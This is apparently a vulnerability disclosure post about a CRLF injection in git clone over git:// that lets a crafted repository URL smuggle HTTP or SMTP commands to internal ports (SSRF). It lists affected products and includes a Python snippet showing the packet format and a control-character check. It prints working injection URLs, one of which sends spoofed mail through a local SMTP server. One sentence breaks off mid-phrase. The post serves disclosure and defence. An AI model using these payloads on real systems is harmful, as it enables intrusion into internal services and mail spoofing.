
git clone CRLF bug leading to SSRF in various products


Sun Nov 08 2020 18:10:00 GMT+0900 (Japan Standard Time)
bughunting, git, kallithea, gogs, gitea, exploit, 0day, bitbucket

Description

When we connect to a server over the git:// protocol, the client sends an initial request packet that looks something like:

```shell
002dgit-upload-pack repo.git\0host=example.com
```

When the repository path contains a newline, the git clone command copies that newline (CR, LF) into the packet as well:

```
002egit-upload-pack repo
.git\0host=example.com
```

It looks harmless at first sight, but the real problem is that the injected line breaks let the packet be sent to other ports and be parsed by other line-oriented protocols, which opens the possibility of an SSRF attack against internal services.

For example, running a command like the following

```shell
$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'
```

will eventually send the following packet to localhost:1234.

```
0050git-upload-pack /
GET / HTTP/1.1
Host:localhost

host=localhost:1234
```

We can somewhat create some sophisticated pro In this way, it is also possible to send SMTP commands like the following and deliver e-mail over the SMTP protocol.

```shell
$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%[email protected]%3E%0d%0aRCPT%20TO%3A%[email protected]%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%0d%0aTo%3A%20%[email protected]%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'
```
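To make the packet format concrete, here is an added example (my own code, not from the post or from git) that encodes the initial git:// request as a pkt-line the way git does (4 hex length digits, then `git-upload-pack <path>\0host=<host>\0`), shows which lines a line-oriented service on the target port would parse out of it when the path carries CR/LF, and applies the kind of control-character check a fixed client needs. The decoded HTTP path is reconstructed from the example above; the rejection check is an assumption about the fix, not a copy of git's patch.

```python
import re

def pkt_line(payload: bytes) -> bytes:
    """Encode one git pkt-line: 4 hex digits giving the total length
    (payload plus the 4 length bytes), followed by the payload itself."""
    total = len(payload) + 4
    if total > 0xFFFF:
        raise ValueError("payload too long for one pkt-line")
    return f"{total:04x}".encode("ascii") + payload

def build_upload_pack_request(path: str, host: str) -> bytes:
    """The first packet a git:// client sends. This mirrors the vulnerable
    behaviour: the repository path is copied into the packet verbatim."""
    payload = (b"git-upload-pack " + path.encode("utf-8")
               + b"\0host=" + host.encode("utf-8") + b"\0")
    return pkt_line(payload)

def lines_seen_by_text_service(packet: bytes) -> list:
    """What a line-oriented service (HTTP, SMTP, ...) on the target port
    would read from the packet: every line after the first line break."""
    body = packet[4:]
    return body.replace(b"\r\n", b"\n").split(b"\n")[1:]

# Assumed hardening check (not git's actual patch): CR, LF and NUL are
# never legitimate inside a repository path or a host name.
_CTRL = re.compile(r"[\r\n\0]")

def safe_upload_pack_request(path: str, host: str) -> bytes:
    """Hardened variant: refuse control characters before building the packet."""
    for field, value in (("path", path), ("host", host)):
        if _CTRL.search(value):
            raise ValueError(f"control character in git:// {field}")
    return build_upload_pack_request(path, host)

if __name__ == "__main__":
    # Constructed input: the URL-decoded path from the HTTP example above.
    path = "/\r\n\r\nGET / HTTP/1.1\r\nHost:localhost\r\n\r\n"
    pkt = build_upload_pack_request(path, "localhost:1234")
    print(pkt)  # starts with b"0050": 80 bytes, as in the post's capture
    for line in lines_seen_by_text_service(pkt):
        print("injected line:", line)
    try:
        safe_upload_pack_request(path, "localhost:1234")
    except ValueError as err:
        print("rejected:", err)
```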

Patch Status

  • git/git has been fixed appropriately.

  • Software that relies on git clone may be affected by this vulnerability.

Affected Products

| Product Name | Current Status | Reference |
| --- | --- | --- |
| git | Fixed | @a02ea577 |
| Kallithea | Fixed | Release Notes v0.63 |
| Gogs | Fixed | Plans to fix in upcoming release (v0.13) |
| Gitea | Fixed | Release v1.12.6 |
| BitBucket | Mitigated | Bounty awarded: P3 |

Unaffected Products

| Product Name | Reason |
| --- | --- |
| GitHub | Git protocol is not supported |
| Gitee | Port part is filtered, which leads to no impact |
| GitLab | CRLF characters were filtered |